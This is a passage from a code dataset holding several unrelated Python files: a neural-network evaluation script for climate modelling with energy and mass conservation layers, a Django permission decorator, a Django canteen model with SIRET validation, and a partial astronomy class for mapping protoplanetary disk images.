EntConsLayer_choice(Layer):\n def __init__(self, inp_sub, inp_div, norm_q, hyai, hybi, lvl_choice, **kwargs):\n \"\"\"\n Call using ([input, output])\n Assumes\n prior: [PHQ, PHCLDLIQ, PHCLDICE, TPHYSTND_nores,\n QRL, QRS, DTVKE, FSNT, FSNS, FLNT, FLNS, PRECT, PRECTEND, PRECST, PRECSTEN]\n Returns\n post(erior): [PHQ, PHCLDLIQ, PHCLDICE, TPHYSTND,\n QRL, QRS, DTVKE, FSNT, FSNS, FLNT, FLNS, PRECT, PRECTEND, PRECST, PRECSTEN]\n \"\"\"\n self.inp_sub, self.inp_div, self.norm_q, self.hyai, self.hybi = \\\n np.array(inp_sub), np.array(inp_div), np.array(norm_q), np.array(hyai), np.array(hybi)\n self.lvl_choice = np.int32(lvl_choice)\n # Define variable indices here\n # Input\n self.PS_idx = 300\n self.SHFLX_idx = 302\n self.LHFLX_idx = 303\n\n # Output\n self.PHQ_idx = slice(0, 30)\n self.PHCLDLIQ_idx = slice(30, 60)\n self.Tbef_idx = slice(90, 90+self.lvl_choice)\n self.DTVKE_idx = slice(179, 209)\n self.FSNT_idx = 209\n self.FSNS_idx = 210\n self.FLNT_idx = 211\n self.FLNS_idx = 212\n self.PRECT_idx = 213\n self.PRECTEND_idx = 214\n self.PRECST_idx = 215\n self.PRECSTEND_idx = 216\n\n super().__init__(**kwargs)\n\n def build(self, input_shape):\n super().build(input_shape)\n\n def get_config(self):\n config = {'inp_sub': list(self.inp_sub), 'inp_div': list(self.inp_div),\n 'norm_q': list(self.norm_q), 'hyai': list(self.hyai),\n 'hybi': list(self.hybi), 'lvl_choice': self.lvl_choice}\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def call(self, arrs):\n inp, prior = arrs\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(\n inp[:, self.PS_idx],\n self.inp_div[self.PS_idx], self.inp_sub[self.PS_idx],\n self.norm_q, self.hyai, self.hybi\n )\n\n # 2. Compute net energy input from phase change and precipitation\n PHAS = L_I / L_V * (\n (prior[:, self.PRECST_idx] + prior[:, self.PRECSTEND_idx]) -\n (prior[:, self.PRECT_idx] + prior[:, self.PRECTEND_idx])\n )\n\n # 3. Compute net energy input from radiation, SHFLX and TKE\n RAD = (prior[:, self.FSNT_idx] - prior[:, self.FSNS_idx] -\n prior[:, self.FLNT_idx] + prior[:, self.FLNS_idx])\n SHFLX = (inp[:, self.SHFLX_idx] * self.inp_div[self.SHFLX_idx] +\n self.inp_sub[self.SHFLX_idx])\n KEDINT = K.sum(dP_tilde * prior[:, self.DTVKE_idx], 1)\n\n # 4. Compute tendency of vapor due to phase change\n LHFLX = (inp[:, self.LHFLX_idx] * self.inp_div[self.LHFLX_idx] +\n self.inp_sub[self.LHFLX_idx])\n VAPINT = K.sum(dP_tilde * prior[:, self.PHQ_idx], 1)\n SPDQINT = (VAPINT - LHFLX) * L_S / L_V\n\n # 5. Same for cloud liquid water tendency\n SPDQCINT = K.sum(dP_tilde * prior[:, self.PHCLDLIQ_idx], 1) * L_I / L_V\n\n # 6. And the same for T but remember residual is still missing\n DTINT = K.sum(dP_tilde[:, :self.lvl_choice] *\\\n prior[:, self.Tbef_idx], 1) +\\\n K.sum(dP_tilde[:, self.lvl_choice+1:30] *\\\n prior[:, 90+self.lvl_choice:119], 1)\n\n # 7. Compute DT30 as residual\n DT_LVL = (\n PHAS + RAD + SHFLX + KEDINT - SPDQINT - SPDQCINT - DTINT\n ) / dP_tilde[:, self.lvl_choice]\n\n # 8. Concatenate output vector\n post = tf.concat([\n prior[:, :(90+self.lvl_choice)], DT_LVL[:, None], \\\n prior[:, (90+self.lvl_choice):]\n ], axis=1)\n return post\n\n def compute_output_shape(self, input_shape):\n \"\"\"Input shape + 1\"\"\"\n return (input_shape[0][0], input_shape[0][1] + 1)\n \nscale_dict = load_pickle('./nn_config/scale_dicts/009_Wm2_scaling.pkl')\nin_vars = load_pickle('./nn_config/scale_dicts/009_Wm2_in_vars.pkl')\nout_vars = load_pickle('./nn_config/scale_dicts/009_Wm2_out_vars.pkl')\ndP = load_pickle('./nn_config/scale_dicts/009_Wm2_dP.pkl')\n\n# Define levels to calculate as residuals\nmlev = 14\nelev = 14\n\nmultiplier = 1\nscale_dict_mult = scale_dict\nscale_dict_mult['PHQ'][mlev] *= multiplier\nscale_dict_mult['TPHYSTND'][elev] *= multiplier\n\ntrain_gen = DataGenerator(\n data_fn = TRAINDIR+PREFIXDS+'train_shuffle.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = TRAINDIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict_mult,\n batch_size=1024,\n shuffle=True\n)\nvalid_gen = DataGenerator(\n data_fn = TRAINDIR+PREFIX+'valid.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = TRAINDIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict_mult,\n batch_size=1024,\n shuffle=False\n)\ntest_gen = DataGenerator(\n data_fn = TRAINDIR+PREFIX+'test.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = TRAINDIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict_mult,\n batch_size=1024,\n shuffle=False\n)\n\nclass Weighted_Loss():\n def __init__(self, lev1, lev2, multiplier, name='weighted_loss',**kwargs):\n self.lev1 = lev1\n self.lev2 = lev2\n self.multiplier = multiplier\n self.__name__ = name\n super().__init__(**kwargs)\n def __call__(self,ytrue,ypred):\n # Multiply two levels of y_pred by multiplier\n ypred_mult = tf.concat([\n ypred[:,:self.lev1],\n tf.expand_dims(self.multiplier*ypred[:,self.lev1],axis=1),\n ypred[:,self.lev1:self.lev2],\n tf.expand_dims(self.multiplier*ypred[:,self.lev2],axis=1),\n ypred[:,self.lev2:]\n ], axis=1)\n # Multiply two levels of y_truth by multiplier\n ytrue_mult = tf.concat([\n ytrue[:,:self.lev1],\n tf.expand_dims(self.multiplier*ytrue[:,self.lev1],axis=1),\n ytrue[:,self.lev1:self.lev2],\n tf.expand_dims(self.multiplier*ytrue[:,self.lev2],axis=1),\n ytrue[:,self.lev2:]\n ], axis=1)\n return (ypred_mult-ytrue_mult)**2\n \ndef Conserving_Model(maslevel,entlevel):\n inpC = Input(shape=(304,))\n densout = Dense(512, activation='linear')(inpC)\n densout = LeakyReLU(alpha=0.3)(densout)\n for i in range (4):\n densout = Dense(512, activation='linear')(densout)\n densout = LeakyReLU(alpha=0.3)(densout)\n densout = Dense(214, activation='linear')(densout)\n densout = LeakyReLU(alpha=0.3)(densout)\n surfout = SurRadLayer(\n inp_div=train_gen.input_transform.div,\n inp_sub=train_gen.input_transform.sub,\n norm_q=scale_dict['PHQ'],\n hyai=hyai, hybi=hybi\n )([inpC, densout])\n massout = MassConsLayer_choice(\n inp_div=train_gen.input_transform.div,\n inp_sub=train_gen.input_transform.sub,\n norm_q=scale_dict['PHQ'],\n hyai=hyai, hybi=hybi\\\n , lvl_choice=maslevel\n )([inpC, surfout])\n enthout = EntConsLayer_choice(\n inp_div=train_gen.input_transform.div,\n inp_sub=train_gen.input_transform.sub,\n norm_q=scale_dict['PHQ'],\n hyai=hyai, hybi=hybi\\\n , lvl_choice=entlevel\n )([inpC, massout])\n return tf.keras.models.Model(inpC, enthout)\n\ndef mass_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n # Input\n PS_idx = 300\n LHFLX_idx = 303\n\n # Output\n PHQ_idx = slice(0, 30)\n PHCLDLIQ_idx = slice(30, 60)\n PHCLDICE_idx = slice(60, 90)\n PRECT_idx = 214\n PRECTEND_idx = 215\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(inp[:, PS_idx], inp_div[PS_idx], inp_sub[PS_idx], norm_q, hyai, hybi)\n\n # 2. Compute water integral\n WATINT = np.sum(dP_tilde *(pred[:, PHQ_idx] + pred[:, PHCLDLIQ_idx] + pred[:, PHCLDICE_idx]), axis=1)\n# print('PHQ',np.mean(np.sum(dP_tilde*pred[:,PHQ_idx],axis=1)))\n# print('PHCLQ',np.mean(np.sum(dP_tilde*pred[:,PHCLDLIQ_idx],axis=1)))\n# print('PHICE',np.mean(np.sum(dP_tilde*pred[:,PHCLDICE_idx],axis=1)))\n\n # 3. Compute latent heat flux and precipitation forcings\n LHFLX = inp[:, LHFLX_idx] * inp_div[LHFLX_idx] + inp_sub[LHFLX_idx]\n PREC = pred[:, PRECT_idx] + pred[:, PRECTEND_idx]\n\n # 4. Compute water mass residual\n# print('LHFLX',np.mean(LHFLX))\n# print('PREC',np.mean(PREC))\n# print('WATINT',np.mean(WATINT))\n WATRES = LHFLX - PREC - WATINT\n #print('WATRES',np.mean(WATRES))\n\n return np.square(WATRES)\n\ndef ent_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n\n # Input\n PS_idx = 300\n SHFLX_idx = 302\n LHFLX_idx = 303\n\n # Output\n PHQ_idx = slice(0, 30)\n PHCLDLIQ_idx = slice(30, 60)\n PHCLDICE_idx = slice(60, 90)\n TPHYSTND_idx = slice(90, 120)\n DTVKE_idx = slice(180, 210)\n FSNT_idx = 210\n FSNS_idx = 211\n FLNT_idx = 212\n FLNS_idx = 213\n PRECT_idx = 214\n PRECTEND_idx = 215\n PRECST_idx = 216\n PRECSTEND_idx = 217\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(inp[:, PS_idx], inp_div[PS_idx], inp_sub[PS_idx], norm_q, hyai, hybi)\n\n # 2. Compute net energy input from phase change and precipitation\n PHAS = L_I / L_V * (\n (pred[:, PRECST_idx] + pred[:, PRECSTEND_idx]) -\n (pred[:, PRECT_idx] + pred[:, PRECTEND_idx])\n )\n\n # 3. Compute net energy input from radiation, SHFLX and TKE\n RAD = (pred[:, FSNT_idx] - pred[:, FSNS_idx] -\n pred[:, FLNT_idx] + pred[:, FLNS_idx])\n SHFLX = (inp[:, SHFLX_idx] * inp_div[SHFLX_idx] +\n inp_sub[SHFLX_idx])\n KEDINT = np.sum(dP_tilde * pred[:, DTVKE_idx], 1)\n\n # 4. Compute tendency of vapor due to phase change\n LHFLX = (inp[:, LHFLX_idx] * inp_div[LHFLX_idx] +\n inp_sub[LHFLX_idx])\n VAPINT = np.sum(dP_tilde * pred[:, PHQ_idx], 1)\n SPDQINT = (VAPINT - LHFLX) * L_S / L_V\n\n # 5. Same for cloud liquid water tendency\n SPDQCINT = np.sum(dP_tilde * pred[:, PHCLDLIQ_idx], 1) * L_I / L_V\n\n # 6. And the same for T but remember residual is still missing\n DTINT = np.sum(dP_tilde * pred[:, TPHYSTND_idx], 1)\n\n # 7. Compute enthalpy residual\n ENTRES = SPDQINT + SPDQCINT + DTINT - RAD - SHFLX - PHAS - KEDINT\n\n return np.square(ENTRES)\n\ndef lw_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n\n # Input\n PS_idx = 300\n\n # Output\n QRL_idx = slice(120, 150)\n FLNS_idx = 213\n FLNT_idx = 212\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(inp[:, PS_idx], inp_div[PS_idx], inp_sub[PS_idx], norm_q, hyai, hybi)\n\n # 2. Compute longwave integral\n LWINT = np.sum(dP_tilde *pred[:, QRL_idx], axis=1)\n\n # 3. Compute net longwave flux from lw fluxes at top and bottom\n LWNET = pred[:, FLNS_idx] - pred[:, FLNT_idx]\n\n # 4. Compute water mass residual\n LWRES = LWINT-LWNET\n\n return np.square(LWRES)\n\ndef sw_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n\n # Input\n PS_idx = 300\n\n # Output\n QRS_idx = slice(150, 180)\n FSNS_idx = 211\n FSNT_idx = 210\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(inp[:, PS_idx], inp_div[PS_idx], inp_sub[PS_idx], norm_q, hyai, hybi)\n\n # 2. Compute longwave integral\n SWINT = np.sum(dP_tilde *pred[:, QRS_idx], axis=1)\n\n # 3. Compute net longwave flux from lw fluxes at top and bottom\n SWNET = pred[:, FSNT_idx] - pred[:, FSNS_idx]\n\n # 4. Compute water mass residual\n SWRES = SWINT-SWNET\n\n return np.square(SWRES)\n\ndef tot_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n return 0.25*(mass_res_diagno(inp_div,inp_sub,norm_q,inp,pred)+\\\n ent_res_diagno(inp_div,inp_sub,norm_q,inp,pred)+\\\n lw_res_diagno(inp_div,inp_sub,norm_q,inp,pred)+\\\n sw_res_diagno(inp_div,inp_sub,norm_q,inp,pred))\n\nmult_array = np.array([1,2,5,10,20])\nend_array = ['_2','_2','','','']\ndict_lay = {'SurRadLayer':SurRadLayer,'MassConsLayer':MassConsLayer,'EntConsLayer':EntConsLayer,\n 'MassConsLayer_choice':MassConsLayer_choice,'EntConsLayer_choice':EntConsLayer_choice,\n 'Conserving_Model':Conserving_Model,'weighted_loss':Weighted_Loss(lev1=14,lev2=104,multiplier=multiplier)}\n\nNN = {}; md = {};\nos.chdir(TRAINDIR+'/HDF5_DATA')\nfor im,multiplier in enumerate(mult_array):\n print('Multiplier is ',multiplier)\n path = TRAINDIR+'HDF5_DATA/Cm14_e14_multiplier'+str(multiplier)+end_array[im]+'.hdf5'\n NN[multiplier] = load_model(path,custom_objects=dict_lay)\n \ngen = valid_gen\n\nSE = {}\nTRES = {}\nMSE = {}\n\nspl = 0\nwhile gen[spl][0].size>0: #spl is sample number\n \n print('spl=',spl,' ',end='\\r')\n \n inp = gen[spl][0]\n truth = gen[spl][1]\n \n for im,multiplier in enumerate(mult_array):\n pred = NN[multiplier].predict_on_batch(inp)\n #pred[:,14] /= multiplier\n #pred[:,104] /= multiplier\n\n se = (pred-truth)**2\n\n pred_phys = pred/gen.output_transform.scale\n\n tresid = tot_res_diagno(gen.input_transform.div,gen.input_transform.sub,\n gen.output_transform.scale[:30],inp,pred)\n\n if spl==0: SE[multiplier] = se; TRES[multiplier] = tresid; MSE[multiplier] = np.mean(se,axis=1);\n else: \n SE[multiplier] += se; \n TRES[multiplier] = np.concatenate((TRES[multiplier],tresid),axis=0); \n MSE[multiplier] = np.concatenate((MSE[multiplier],np.mean(se,axis=1)),axis=0);\n\n spl += 1\n \nfor imultiplier,multiplier in enumerate(mult_array): SE[multiplier] /= spl\n \npathPKL = '/home/t/Tom.Beucler/SPCAM/CBRAIN-CAM/notebooks/tbeucler_devlog/PKL_DATA/'\n\nhf = open(pathPKL+'2020_03_04_validgen036.pkl','wb')\nS = {\"TRES\":TRES,\"MSE\":MSE,\"SE\":SE}\npickle.dump(S,hf)\nhf.close()","sub_path":"notebooks/tbeucler_devlog/036_Eval_valid.py","file_name":"036_Eval_valid.py","file_ext":"py","file_size_in_byte":17755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"137789176","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect\n\ndecorator_with_arguments = lambda decorator: lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)\n\n\ndef has_uploader_permission(func):\n def _function(request, *args, **kwargs):\n uploader_permissions = [\n 'uploader.uploader_access',\n 'uploader.uploader_admin',\n 'uploader.uploader_surf',\n 'uploader.uploader_bhop',\n ]\n for perm in uploader_permissions:\n if request.user.has_perm(perm):\n return func(request, *args, **kwargs)\n\n # we did not find a valid permission\n return redirect('uploader:disabled')\n return _function","sub_path":"home/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"140469573","text":"from urllib.parse import quote\nfrom django.db import models\nfrom django.contrib.auth import get_user_model\nfrom django.core.exceptions import ValidationError\nfrom data.department_choices import Department\nfrom data.utils import optimize_image\nfrom .sector import Sector\nfrom .softdeletionmodel import SoftDeletionModel\n\n\ndef validate_siret(siret):\n \"\"\"\n Performs length and Luhn validation\n (https://portal.hardis-group.com/pages/viewpage.action?pageId=120357227)\n \"\"\"\n if siret is None or siret == \"\":\n return\n if len(siret) != 14:\n raise ValidationError(\"14 caractères numériques sont attendus\")\n odd_digits = [int(n) for n in siret[-1::-2]]\n even_digits = [int(n) for n in siret[-2::-2]]\n checksum = sum(odd_digits)\n for digit in even_digits:\n checksum += sum(int(n) for n in str(digit * 2))\n luhn_checksum_valid = checksum % 10 == 0\n\n if not luhn_checksum_valid:\n raise ValidationError(\"Le numéro SIRET n'est pas valide.\")\n\n\nclass Canteen(SoftDeletionModel):\n class Meta:\n verbose_name = \"cantine\"\n verbose_name_plural = \"cantines\"\n ordering = [\"-creation_date\"]\n\n class ManagementType(models.TextChoices):\n DIRECT = \"direct\", \"Directe\"\n CONCEDED = \"conceded\", \"Concédée\"\n\n class ProductionType(models.TextChoices):\n CENTRAL = \"central\", \"Cuisine centrale\"\n ON_SITE = \"site\", \"Cuisine-site\"\n\n class PublicationStatus(models.TextChoices):\n DRAFT = \"draft\", \"🔒 Non publié\"\n PENDING = \"pending\", \"❓ En attente de vérification\"\n PUBLISHED = \"published\", \"✅ Publié\"\n\n creation_date = models.DateTimeField(auto_now_add=True)\n modification_date = models.DateTimeField(auto_now=True)\n\n name = models.TextField(verbose_name=\"nom\")\n\n city = models.TextField(null=True, blank=True, verbose_name=\"ville\")\n city_insee_code = models.TextField(null=True, blank=True, verbose_name=\"Code INSEE\")\n\n department = models.TextField(\n null=True, blank=True, choices=Department.choices, verbose_name=\"département\"\n )\n postal_code = models.CharField(\n max_length=20, null=True, blank=True, verbose_name=\"code postal\"\n )\n sectors = models.ManyToManyField(\n Sector, blank=True, verbose_name=\"secteurs d'activité\"\n )\n managers = models.ManyToManyField(\n get_user_model(),\n blank=True,\n related_name=\"canteens\",\n verbose_name=\"gestionnaires\",\n )\n\n daily_meal_count = models.IntegerField(\n null=True, blank=True, verbose_name=\"repas par jour\"\n )\n # TODO: once have a standardised format (see _normalise_siret), index by siret if given\n siret = models.TextField(null=True, blank=True, validators=[validate_siret])\n central_producer_siret = models.TextField(\n null=True,\n blank=True,\n verbose_name=\"siret de la cuisine centrale\",\n validators=[validate_siret],\n )\n management_type = models.CharField(\n max_length=255,\n choices=ManagementType.choices,\n null=True,\n blank=True,\n verbose_name=\"mode de gestion\",\n )\n production_type = models.CharField(\n max_length=255,\n choices=ProductionType.choices,\n null=True,\n blank=True,\n verbose_name=\"mode de production\",\n )\n\n main_image = models.ImageField(\n null=True, blank=True, verbose_name=\"Image principale\"\n )\n\n # Publication things\n publication_status = models.CharField(\n max_length=50,\n choices=PublicationStatus.choices,\n default=\"draft\",\n verbose_name=\"état de publication\",\n )\n publication_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de publication\",\n )\n quality_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure appro\",\n )\n waste_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure gaspillage\",\n )\n diversification_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure diversification\",\n )\n plastics_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure plastiques\",\n )\n information_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure information\",\n )\n\n def save(\n self, force_insert=False, force_update=False, using=None, update_fields=None\n ):\n max_image_size = 1024\n if self.main_image:\n self.main_image = optimize_image(\n self.main_image, self.main_image.name, max_image_size\n )\n super(Canteen, self).save(force_insert, force_update, using, update_fields)\n\n @property\n def url_path(self):\n slug = f\"{quote(self.name)}--{self.id}\"\n return f\"/nos-cantines/{slug}\"\n\n def __str__(self):\n return f'Cantine \"{self.name}\"'\n\n def update_publication_comments(self, data):\n self.publication_comments = data.get(\"publication_comments\")\n self.quality_comments = data.get(\"quality_comments\")\n self.waste_comments = data.get(\"waste_comments\")\n self.diversification_comments = data.get(\"diversification_comments\")\n self.plastics_comments = data.get(\"plastics_comments\")\n self.information_comments = data.get(\"information_comments\")\n","sub_path":"data/models/canteen.py","file_name":"canteen.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"64983263","text":"\"\"\"\nModule with mapping functionalities for protoplanetary disks.\n\"\"\"\n\nimport math\nimport warnings\n\nfrom typing import List, Optional, Tuple\n\nimport numpy as np\n\nfrom astropy.io import fits\nfrom scipy.interpolate import griddata, interp1d\nfrom typeguard import typechecked\n\n\nclass DiskMap:\n \"\"\"\n Class for mapping a surface layer of a protoplanetary disk.\n \"\"\"\n\n @typechecked\n def __init__(self,\n fitsfile: str,\n pixscale: float,\n inclination: float,\n pos_angle: float,\n distance: float,\n image_type: str = 'polarized') -> None:\n \"\"\"\n Parameters\n ----------\n fitsfile : str\n FITS file with the scattered light image.\n pixscale : float\n Pixel scale (arcsec per pixel).\n inclination : float\n Inclination of the disk (deg). Include a minus sign to exchange the near and far side\n with the mapping of the disk.\n pos_angle : float\n Position angle of the disk (deg). Defined in counterclockwise direction with respect\n to the vertical axis (i.e. east of north).\n distance : float\n Distance (pc).\n image_type : str\n Image type ('polarized' or 'total'). This parameter affects the output that will be\n stored. For example, the conversion from polarized to total intensity phase function\n is only done with `image_type='polarized'`.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n self.image = fits.getdata(fitsfile)\n self.image = np.nan_to_num(self.image)\n\n if self.image.ndim == 3:\n warn.warnings('The FITS file contains a 3D data cube so using the first image.')\n\n self.image = self.image[0, ]\n\n elif self.image.ndim != 2:\n raise ValueError('DiskMap requires a 2D image.')\n\n if self.image.shape[0] != self.image.shape[1]:\n raise ValueError('The dimensions of the image should have the same size.')\n\n if image_type not in ['polarized', 'total']:\n raise ValueError('The argument of \\'image_type\\' should be set to \\'polarized\\' '\n 'or \\'total\\'.')\n\n self.pixscale = pixscale # (arcsec)\n self.incl = math.radians(inclination) # (rad)\n self.pos_ang = math.radians(pos_angle) # (rad)\n self.distance = distance # (pc)\n self.image_type = image_type\n\n self.grid = 501 # should be odd\n\n self.radius = None\n self.azimuth = None\n self.opening = None\n self.scatter = None\n self.im_deproj = None\n self.im_scaled = None\n self.stokes_i = None\n self.phase = None\n\n # sum_before = np.sum(self.image)\n\n # im_scale = rescale(image=np.asarray(self.image, dtype=np.float64),\n # scale=(10., 10.),\n # order=5,\n # mode='reflect',\n # anti_aliasing=True,\n # multichannel=False)\n\n # sum_after = np.sum(im_scale)\n\n # self.image = im_scale * (sum_before / sum_after)\n # self.pixscale /= 10.\n\n self.npix = self.image.shape[0]\n\n @typechecked\n def map_disk(self,\n power_law: Tuple[float, float, float],\n radius: Tuple[float, float, int] = (1., 500., 100),\n surface: str = 'power-law',\n filename: Optional[str] = None) -> None:\n \"\"\"\n Function for mapping a scattered light image to a power-law disk surface.\n\n Parameters\n ----------\n power_law : tuple(float, float, float)\n The argument for the power-law function, provided as (a, b, c) with\n f(x) = a + b*x^c, with ``a`` and ``b`` in au. Set all values to zero for the mapping\n and deprojection of a geometrically flat disk, in which case only the inclination is\n used for the deprojection.\n radius : tuple(float, float, int)\n Radius points that are sampled, provided as (r_in, r_out, n_r), with ``r_in`` and\n ``r_out`` in au. The outer radius should be set large enough such that a radius is\n sampled for each pixel in the field of view. To check if any NaNs are present, have\n a look at the `_radius.fits` output.\n surface : str\n Parameterization type for the disk surface ('power-law' or 'file').\n filename : star, None\n Filename which contains the radius in au (first column) and the height of the disk\n surface in au (second column).\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if surface == 'power-law':\n\n # Power-law disk height\n\n @typechecked\n def power_law_height(x_power: np.ndarray,\n a_power: float,\n b_power: float,\n c_power: float) -> np.ndarray:\n\n return a_power + b_power*x_power**c_power\n\n # midplane radius (au)\n disk_radius = np.linspace(radius[0], radius[1], radius[2])\n\n # disk height (au)\n disk_height = power_law_height(disk_radius, power_law[0], power_law[1], power_law[2])\n\n # opening angle (rad)\n disk_opening = np.arctan2(disk_height, disk_radius)\n\n elif surface == 'file':\n\n # Read disk height from ASCII file\n\n data = np.loadtxt(filename)\n\n # midplane radius (au)\n disk_radius = np.linspace(radius[0], radius[1], radius[2])\n\n # disk height (au)\n height_interp = interp1d(data[:, 0], data[:, 1])\n disk_height = height_interp(disk_radius)\n\n # opening angle (rad)\n disk_opening = np.arctan2(disk_height, disk_radius) # (au)\n\n # Project disk height to image plane\n\n disk_phi = np.linspace(0., 359., 360) # (deg)\n disk_phi = np.radians(disk_phi) # (rad)\n\n x_im = []\n y_im = []\n r_im = []\n o_im = []\n s_im = []\n p_im = []\n\n for i, r_item in enumerate(disk_radius):\n for j, p_item in enumerate(disk_phi):\n\n x_tmp = r_item * np.sin(p_item)\n\n y_tmp = disk_height[i]*math.sin(self.incl) - \\\n r_item*np.cos(p_item)*math.cos(self.incl)\n\n x_rot = x_tmp*math.cos(math.pi-self.pos_ang) - \\\n y_tmp*math.sin(math.pi-self.pos_ang)\n\n y_rot = x_tmp*math.sin(math.pi-self.pos_ang) + \\\n y_tmp*math.cos(math.pi-self.pos_ang)\n\n x_im.append(x_rot)\n y_im.append(y_rot)\n\n r_im.append(math.sqrt(r_item**2+disk_height[i]**2))\n p_im.append(p_item)\n o_im.append(disk_opening[i])\n\n ang_tmp = math.pi/2.+disk_opening[i]\n\n par1 = math.sin(ang_tmp)*math.cos(math.pi+p_item)*math.sin(self.incl)\n par2 = math.cos(ang_tmp)*math.cos(self.incl)\n\n s_im.append(math.pi - math.acos(par1+par2))\n\n # Sort image plane points along x-axis\n\n x_index = np.argsort(x_im)\n\n y_sort = np.zeros(len(y_im))\n r_sort = np.zeros(len(y_im))\n p_sort = np.zeros(len(y_im))\n o_sort = np.zeros(len(y_im))\n s_sort = np.zeros(len(y_im))\n\n for i in range(len(y_im)):\n y_sort[i] = y_im[x_index[i]]\n r_sort[i] = r_im[x_index[i]]\n p_sort[i] = p_im[x_index[i]]\n o_sort[i] = o_im[x_index[i]]\n s_sort[i] = s_im[x_index[i]]\n\n grid_xy = np.zeros((self.grid**2, 2))\n\n count = 0\n\n for i in range(-(self.grid-1)//2, (self.grid-1)//2+1):\n for j in range(-(self.grid-1)//2, (self.grid-1)//2+1):\n grid_xy[count, 0] = float(i)\n grid_xy[count, 1] = float(j)\n\n count += 1\n\n image_xy = np.zeros((len(x_im), 2))\n\n for i, _ in enumerate(x_im):\n image_xy[i, 0] = x_im[i]\n image_xy[i, 1] = y_im[i]\n\n # Interpolate image plane\n\n if self.npix % 2 == 0:\n x_grid = np.linspace(-self.npix/2+0.5, self.npix/2-0.5, self.npix)\n y_grid = np.linspace(-self.npix/2+0.5, self.npix/2-0.5, self.npix)\n\n elif self.npix % 2 == 1:\n x_grid = np.linspace(-(self.npix-1)/2, (self.npix-1)/2, self.npix)\n y_grid = np.linspace(-(self.npix-1)/2, (self.npix-1)/2, self.npix)\n\n x_grid *= self.pixscale*self.distance # (au)\n y_grid *= self.pixscale*self.distance # (au)\n\n grid = np.zeros((self.npix**2, 2))\n\n count = 0\n\n for i in range(self.npix):\n for j in range(self.npix):\n grid[count, 0] = x_grid[i]\n grid[count, 1] = x_grid[j]\n\n count += 1\n\n fit_radius = griddata(image_xy, r_im, grid, method='linear')\n fit_azimuth = griddata(image_xy, p_im, grid, method='linear')\n fit_opening = griddata(image_xy, o_im, grid, method='linear')\n fit_scatter = griddata(image_xy, s_im, grid, method='linear')\n\n self.radius = np.zeros((self.npix, self.npix))\n self.azimuth = np.zeros((self.npix, self.npix))\n self.opening = np.zeros((self.npix, self.npix))\n self.scatter = np.zeros((self.npix, self.npix))\n\n count = 0\n\n for i in range(self.npix):\n for j in range(self.npix):\n self.radius[i, j] = fit_radius[count]\n self.azimuth[i, j] = fit_azimuth[count]\n self.opening[i, j] = fit_opening[count]\n self.scatter[i, j] = fit_scatter[count]\n\n count += 1\n\n @typechecked\n def sort_disk(self) -> Tuple[List[np.float64], np.ndarray]:\n \"\"\"\n Function for creating a list with pixel values and creating a 2D array with the x and y\n pixel coordinates.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n # Create lists with x and y coordinates and pixel values\n\n x_disk = []\n y_disk = []\n im_disk = []\n\n for i in range(self.npix):\n for j in range(self.npix):\n x_tmp = self.radius[i, j]*np.cos(self.azimuth[i, j])\n y_tmp = self.radius[i, j]*np.sin(self.azimuth[i, j])\n\n x_disk.append(x_tmp*math.cos(math.pi/2.-self.pos_ang) -\n y_tmp*math.sin(math.pi/2.-self.pos_ang))\n\n y_disk.append(x_tmp*math.sin(math.pi/2.-self.pos_ang) +\n y_tmp*math.cos(math.pi/2.-self.pos_ang))\n\n im_disk.append(self.image[i, j])\n\n # Sort disk plane points along x-axis\n\n x_index = np.argsort(x_disk)\n\n y_sort = np.zeros(len(y_disk))\n im_sort = np.zeros(len(y_disk))\n\n for i in range(len(y_disk)):\n y_sort[i] = y_disk[x_index[i]]\n im_sort[i] = im_disk[x_index[i]]\n\n # count = 0\n #\n # grid_xy = np.zeros((self.grid**2, 2))\n #\n # for i in range(-(self.grid-1)//2, (self.grid-1)//2+1):\n # for j in range(-(self.grid-1)//2, (self.grid-1)//2+1):\n # grid_xy[count, 0] = float(i)\n # grid_xy[count, 1] = float(j)\n #\n # count += 1\n\n image_xy = np.zeros((len(y_disk), 2))\n\n for i, _ in enumerate(y_disk):\n image_xy[i, 0] = x_disk[i]\n image_xy[i, 1] = y_disk[i]\n\n return im_disk, image_xy\n\n @typechecked\n def deproject_disk(self) -> None:\n \"\"\"\n Function for deprojecting a disk surface based on the mapping of\n 